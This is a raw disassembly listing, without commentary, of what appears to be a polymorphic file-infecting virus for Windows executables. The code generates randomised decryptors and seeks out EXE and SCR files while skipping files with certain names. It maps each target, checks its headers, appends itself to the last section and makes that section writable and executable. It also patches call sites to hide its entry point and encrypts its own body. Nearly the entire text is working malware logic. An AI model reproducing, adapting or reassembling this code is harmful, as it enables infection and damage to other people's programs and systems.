test dword ptr [ebp+403431h], 800h
jnz short loc_1008C84
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_1008C99
; ---------------------------------------------------------------------------
loc_1008C84: ; CODE XREF: .rsrc:01008C71�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_1008C99: ; CODE XREF: .rsrc:01008C82�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_1008CAC
add ah, 8
loc_1008CAC: ; CODE XREF: .rsrc:01008CA7�j
or ah, [ebp+40342Bh]
stosw
loc_1008CB4: ; CODE XREF: .rsrc:01008C65�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_1008CBC: ; CODE XREF: .rsrc:01008C4E�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_1008CD1
mov al, 50h
add al, [ebp+403429h]
stosb
loc_1008CD1: ; CODE XREF: .rsrc:01008CC6�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_1008CE1
add al, 4
loc_1008CE1: ; CODE XREF: .rsrc:01008CDD�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_1008CFE
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_1008CFE: ; CODE XREF: .rsrc:01008CF5�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_1008D10
mov ah, 29h
loc_1008D10: ; CODE XREF: .rsrc:01008D0C�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_1008D2E
mov al, 86h
loc_1008D2E: ; CODE XREF: .rsrc:01008D2A�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_1008D42
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_1008D42: ; CODE XREF: .rsrc:01008D39�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_1008D59
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_1008D68
; ---------------------------------------------------------------------------
loc_1008D59: ; CODE XREF: .rsrc:01008D4C�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_1008D68: ; CODE XREF: .rsrc:01008D57�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_1008DA3
test dword ptr [ebp+403431h], 40000h
jnz short loc_1008D9A
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_1008DA2
; ---------------------------------------------------------------------------
loc_1008D9A: ; CODE XREF: .rsrc:01008D7E�j
mov al, 40h
or al, [ebp+40342Bh]
loc_1008DA2: ; CODE XREF: .rsrc:01008D98�j
stosb
loc_1008DA3: ; CODE XREF: .rsrc:01008D72�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_1008DBF
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_1008DC7
; ---------------------------------------------------------------------------
loc_1008DBF: ; CODE XREF: .rsrc:01008DAD�j
mov al, 48h
or al, [ebp+40342Ah]
loc_1008DC7: ; CODE XREF: .rsrc:01008DBD�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_1008DFB
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_1008E16
mov cl, 77h
jmp short loc_1008E16
; ---------------------------------------------------------------------------
loc_1008DFB: ; CODE XREF: .rsrc:01008DD4�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_1008E16: ; CODE XREF: .rsrc:01008DF5�j
; .rsrc:01008DF9�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_1008EC0
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_1008E57
mov eax, 2E876467h
loc_1008E57: ; CODE XREF: .rsrc:01008E50�j
stosd
mov eax, 0
stosw
jnz short loc_1008E67
mov ax, 0E58Bh
stosw
loc_1008E67: ; CODE XREF: .rsrc:01008E5F�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_1008EBD
test dword ptr [ebp+403431h], 8000000h
jz short loc_1008EAF
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_1008EAA
mov ax, 424h
stosw
jmp short loc_1008EBD
; ---------------------------------------------------------------------------
loc_1008EAA: ; CODE XREF: .rsrc:01008EA0�j
mov al, 8
stosb
jmp short loc_1008EBD
; ---------------------------------------------------------------------------
loc_1008EAF: ; CODE XREF: .rsrc:01008E87�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_1008EC0
; ---------------------------------------------------------------------------
loc_1008EBD: ; CODE XREF: .rsrc:01008E7B�j
; .rsrc:01008EA8�j ...
mov al, 0C9h
stosb
loc_1008EC0: ; CODE XREF: .rsrc:01008E33�j
; .rsrc:01008EBB�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_1008EEC
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_1008EEC: ; CODE XREF: .rsrc:01008ECA�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_1008F57
test dword ptr [ebp+403431h], 20000000h
jz short loc_1008F1D
loc_1008F10: ; CODE XREF: .rsrc:01008F1B�j
test edi, 3
jz short loc_1008F1D
mov al, 90h
stosb
jmp short loc_1008F10
; ---------------------------------------------------------------------------
loc_1008F1D: ; CODE XREF: .rsrc:01008F0E�j
; .rsrc:01008F16�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_1008F4B
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_1008F55
; ---------------------------------------------------------------------------
loc_1008F4B: ; CODE XREF: .rsrc:01008F3D�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_1008F55: ; CODE XREF: .rsrc:01008F49�j
stosw
loc_1008F57: ; CODE XREF: .rsrc:01008F02�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_1008FD6
test dword ptr [ebp+403431h], 20000000h
jz short loc_1008F7C
loc_1008F6F: ; CODE XREF: .rsrc:01008F7A�j
test edi, 3
jz short loc_1008F7C
mov al, 90h
stosb
jmp short loc_1008F6F
; ---------------------------------------------------------------------------
loc_1008F7C: ; CODE XREF: .rsrc:01008F6D�j
; .rsrc:01008F75�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_1008FA5
lea eax, [ebp+403429h]
loc_1008F9D: ; CODE XREF: .rsrc:01008FA3�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_1008F9D
loc_1008FA5: ; CODE XREF: .rsrc:01008F95�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_1008FBA
mov ax, 0C031h
stosw
loc_1008FBA: ; CODE XREF: .rsrc:01008FB2�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_1008FD3
mov ax, 0C031h
stosw
loc_1008FD3: ; CODE XREF: .rsrc:01008FCB�j
mov al, 0C3h
stosb
loc_1008FD6: ; CODE XREF: .rsrc:01008F61�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_1008FEE
push edi
sub edi, eax
pop eax
jmp short loc_1009007
; ---------------------------------------------------------------------------
loc_1008FEE: ; CODE XREF: .rsrc:01008FE6�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_1009007: ; CODE XREF: .rsrc:01008FEC�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_1009027
neg eax
loc_1009027: ; CODE XREF: .rsrc:01009023�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_100902B proc near ; CODE XREF: sub_1009457+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_1009213
call near ptr loc_100904B+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_100904B: ; CODE XREF: sub_100902B+F�p
add bh, bh
sub_100902B endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_1008765
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_1008765
mov edi, [ebp+4039A6h]
push esi
call sub_1008765
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_1009213
jz loc_1009213
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_10091E4
loc_10090C5: ; CODE XREF: sub_10091E4+29�j
lodsb
cmp al, 0E8h
jnz loc_1009170
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_1008765
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_10090F3
cmp eax, [edi+0Ch]
jnb loc_100920C
jmp short loc_10090FF
; ---------------------------------------------------------------------------
loc_10090F3: ; CODE XREF: sub_10091E4-FE�j
cmp [ebp+4039A6h], edx
jnz loc_100920C
loc_10090FF: ; CODE XREF: sub_10091E4-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_100920C
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_1008765
cmp [ebp+4039A6h], edi
jnz loc_100920C
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_100920C
cmp eax, [edi+8]
jnb loc_100920C
loc_1009148: ; CODE XREF: sub_10091E4+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_1009222
jmp loc_100920C
; ---------------------------------------------------------------------------
loc_1009170: ; CODE XREF: sub_10091E4-11C�j
cmp al, 0FFh
jnz loc_100920C
cmp byte ptr [esi], 15h
jnz loc_100920C
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_1008765
cmp [ebp+4039A6h], edi
jnz short loc_100920C
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_10091B9
cmp eax, [ebp+4039C6h]
jb short loc_1009222
loc_10091B9: ; CODE XREF: sub_10091E4-35�j
cmp eax, 70000000h
jb short loc_10091F7
call sub_10091E4
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_10091E3
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_10091FE
; ---------------------------------------------------------------------------
locret_10091E3: ; CODE XREF: sub_10091E4-F�j
retn
; END OF FUNCTION CHUNK FOR sub_10091E4
; =============== S U B R O U T I N E =======================================
sub_10091E4 proc near ; CODE XREF: sub_10091E4-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 010090C5 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_100886C
popa
loc_10091F7: ; CODE XREF: sub_10091E4-26�j
test eax, 80000000h
jnz short loc_100920C
loc_10091FE: ; CODE XREF: sub_10091E4-3�j
sub eax, [edi+0Ch]
jb short loc_100920C
cmp eax, [edi+8]
jb loc_1009148
loc_100920C: ; CODE XREF: sub_10091E4-F9�j
; sub_10091E4-EB�j ...
dec ecx
jnz loc_10090C5
loc_1009213: ; CODE XREF: sub_100902B+9�j
; .rsrc:010090AD�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_100925E
; ---------------------------------------------------------------------------
loc_1009222: ; CODE XREF: sub_10091E4-7F�j
; sub_10091E4-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_100925E: ; CODE XREF: sub_10091E4+3C�j
pop edi
pop esi
retn
sub_10091E4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_1009261 proc near ; CODE XREF: .rsrc:0100942F�p
; sub_1009457+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_1009332
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_1009332
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_10097EA
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_10097DE
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_10097DE
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_10097DE
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_10097B6
mov [ebp+403972h], eax
locret_1009332: ; CODE XREF: sub_1009261+10�j
; sub_1009261+27�j ...
retn
sub_1009261 endp
; =============== S U B R O U T I N E =======================================
sub_1009333 proc near ; CODE XREF: sub_1009457+117�p
; sub_1009457+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_100934D
add eax, [ebp+40106Dh]
loc_100934D: ; CODE XREF: sub_1009333+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_1009333 endp
; =============== S U B R O U T I N E =======================================
sub_1009378 proc near ; CODE XREF: sub_1009457:loc_10094A6�p
; sub_1009457+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_100937D: ; CODE XREF: sub_1009378+23�j
jecxz short locret_10093B4
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_10093B4
cmp dword ptr [edx+0Ch], 1
jb short loc_100937D
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_10093B4: ; CODE XREF: sub_1009378:loc_100937D�j
; sub_1009378+1D�j ...
retn
sub_1009378 endp
; =============== S U B R O U T I N E =======================================
sub_10093B5 proc near ; CODE XREF: .rsrc:01009441�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_10093B5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_10093C2: ; CODE XREF: .rsrc:010093E3�j
mov ecx, edi
jmp short loc_10093D1
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_10093CD: ; CODE XREF: .rsrc:010093DF�j
mov ebx, edi
xor ecx, ecx
loc_10093D1: ; CODE XREF: .rsrc:010093C4�j
; .rsrc:010093E7�j
lodsb
cmp al, 61h
jb short loc_10093DC
cmp al, 7Ah
ja short loc_10093DC
sub al, 20h
loc_10093DC: ; CODE XREF: .rsrc:010093D4�j
; .rsrc:010093D8�j
stosb
cmp al, 5Ch
jz short loc_10093CD
cmp al, 2Eh
jz short loc_10093C2
cmp al, 0
jnz short loc_10093D1
jecxz short locret_10093B4
mov eax, [ecx]
cmp eax, 455845h
jz short loc_10093FF
cmp eax, 524353h
jnz locret_1009332
loc_10093FF: ; CODE XREF: .rsrc:010093F2�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_1009332
cmp eax, 4E554357h
jz locret_1009332
cmp eax, 32334357h
jz locret_1009332
cmp eax, 4F545350h
jz locret_1009332
xor ebx, ebx
call sub_1009261
jz locret_1009332
xor edx, edx
call sub_1009457
call sub_10093B5
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_1009794
; =============== S U B R O U T I N E =======================================
sub_1009457 proc near ; CODE XREF: .rsrc:0100943C�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_1009794
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_1009794
test dword ptr [ebx+16h], 2000h
jnz loc_1009794
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_1009794
jecxz short loc_10094A6
cmp ecx, 101h
jbe loc_1009794
loc_10094A6: ; CODE XREF: sub_1009457+41�j
call sub_1009378
jb loc_1009794
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_1007FB0
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_10094D0: ; CODE XREF: sub_1009457+92�j
push 20h
dec cl
pop eax
js short loc_10094EB
call sub_1007FB0
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_10094D0
; ---------------------------------------------------------------------------
loc_10094EB: ; CODE XREF: sub_1009457+7E�j
; sub_1009457+CD�j ...
push 6
pop ecx
loc_10094F1: ; CODE XREF: sub_1009457+B8�j
push 6
pop eax
call sub_1007FB0
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_10094F1
test dword ptr [ebp+403431h], 8
jnz short loc_1009526
cmp byte ptr [ebp+40342Bh], 1
jz short loc_10094EB
loc_1009526: ; CODE XREF: sub_1009457+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_100954D
cmp byte ptr [ebp+403429h], 5
jz short loc_10094EB
cmp byte ptr [ebp+40342Ah], 5
jz short loc_10094EB
cmp byte ptr [ebp+40342Bh], 5
jz short loc_10094EB
loc_100954D: ; CODE XREF: sub_1009457+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_1009562
cmp byte ptr [ebp+403429h], 2
ja short loc_10094EB
loc_1009562: ; CODE XREF: sub_1009457+100�j
and dword ptr [ebp+4039AEh], 0
call loc_10089FD
call sub_1009333
call sub_100979D
mov ebx, [ebp+403976h]
call sub_1009261
jz loc_1009794
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_1009378
jb loc_1009794
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_10095CA
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_10095CA: ; CODE XREF: sub_1009457+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_10095DE
rep movsb
loc_10095DE: ; CODE XREF: sub_1009457+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_1009696
push dword ptr [ebx+28h]
call sub_1008765
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_1009696
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_100961B
xor ecx, ecx
loc_100961B: ; CODE XREF: sub_1009457+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_1009682
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_100965B
neg dword ptr [eax]
loc_100965B: ; CODE XREF: sub_1009457+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_1009679
neg dword ptr [eax]
loc_1009679: ; CODE XREF: sub_1009457+21E�j
push ecx
call sub_1009333
pop ecx
jmp short loc_100968E
; ---------------------------------------------------------------------------
loc_1009682: ; CODE XREF: sub_1009457+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_100968E: ; CODE XREF: sub_1009457+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_1009696: ; CODE XREF: sub_1009457+191�j
; sub_1009457+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_10096AF
imul edx, 12345678h
loc_10096AF: ; CODE XREF: sub_1009457+250�j
mov [eax-1], dl
call near ptr dword_10074C4+1BFh
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_10096E0
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_10096E0: ; CODE XREF: sub_1009457+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_1009705
push edx
call sub_100902B
pop edx
loc_1009705: ; CODE XREF: sub_1009457+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_1009710
mov [ebx+28h], ecx
loc_1009710: ; CODE XREF: sub_1009457+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_1009721
mov [edx+8], ecx
loc_1009721: ; CODE XREF: sub_1009457+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_1009752
add ecx, [ebp+40106Dh]
loc_1009752: ; CODE XREF: sub_1009457+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_1009774
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_1009774
mov dh, [ebp+403430h]
loc_1009774: ; CODE XREF: sub_1009457+307�j
; sub_1009457+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_100978B
loc_1009780: ; CODE XREF: sub_1009457+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_1009780
jmp short loc_1009794
; ---------------------------------------------------------------------------
loc_100978B: ; CODE XREF: sub_1009457+327�j
; sub_1009457+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_100978B
loc_1009794: ; CODE XREF: .rsrc:01009452�j
; sub_1009457+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_1009457 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_100979D proc near ; CODE XREF: sub_1009457+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_1009332
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_10097B6: ; CODE XREF: sub_1009261+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_10097DE: ; CODE XREF: sub_1009261+6B�j
; sub_1009261+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_10097EA: ; CODE XREF: sub_1009261+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_100979D endp
; ---------------------------------------------------------------------------
db 0E8h, 2 dup(0)
dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
dd 3024548Bh, 811A8B5Dh, 403413EDh, 0E539E800h, 0C261FFFFh
dd 1060004h, 7030502h, 3E9B8927h, 187BDA82h, 30A80E02h
dd 2Ah, 40h dup(0)
dd 1280h dup(?)
_rsrc ends
end start